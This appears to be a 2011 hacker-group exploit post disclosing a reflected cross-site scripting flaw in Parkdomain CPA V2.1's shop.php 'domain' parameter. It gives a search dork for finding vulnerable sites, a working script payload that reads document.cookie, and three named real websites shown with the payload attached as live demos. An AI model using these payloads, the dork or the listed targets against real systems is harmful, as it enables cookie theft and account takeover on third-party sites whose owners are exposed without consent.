Parkdomain CPA V2.1 (shop.php) Remote XSS Exploit
2011-04-04 13:54:24Posted by: HaNniBaL KsA
[./rS]
#####################################################
# #
# _______ _______ | #
# ( ____ )( ____ \ | #
# | ( )|| ( \/ | #
# | (____)|| (_____ | r00t s3cur1ty #
# | __)(_____ ) | t34m #
# | (\ ( ) | | #
# | ) \ \__/\____) | | #
# |/ \__/\_______) | #
# #
#####################################################
[#] Title : Parkdomain CPA V2.1 (shop.php) Remote XSS Exploit!
[#] Version : 2.1
[#] Author : HaNniBaL KsA (HK)
[#] E-mail : [email protected] & [email protected]
[#] Software : Not Available ()
[#] Home : p0c.cc (Proof Of Concepts | P0C Team)
[#] Twitter : twitter.com/r00t_s3cur1ty
[#] Date : 02-04-2011
[#] Dork : Powered By Parkdomain CPA V2.1
[#] Category : Cross-site scriptin (XSS)
[#] Tested on : Fedora 14 & Windows XP sp3 & Windows Vista
[!] Browser test : FireFox 3.6.15 & Chrome 10.0.648.151 & Opera 11.01
-------------------------------------------------------------------------
[+] Vulnerability:
[~] http://site/path/shop.php?domain=XSS
[+] Example:
[~] http://site/path/shop.php?domain="><script>alert(document.cookie);</script>
-------------------------------------------------------------------------
[#] Demo site (3 vuln site) :
[!] http://home.ppc1000.com/shop.php?domain="><script>alert(document.cookie);</script>
[!] http://wwww.zccbw.com/shop.php?domain="><script>alert(document.cookie);</script>
[!] http://www.offercpa.com/shop.php?domain="><script>alert(document.cookie);</script>
[OoPs! :P]
-------------------------------------------------------------------------
[-] Greetz 2 : Ejram Hacker ; SiLvEr.47 (Dr.SiLvEr) ; Sn!pEr.S!Te ; Abo z7z7 ; ViRuS KsA ; MooT Hacker ; NoQRQR ; Dr.KroOoZ ; Mr.DH ; ...All In MsN!
Fixes
No fixesIn order to submit a new fix you need to be registered.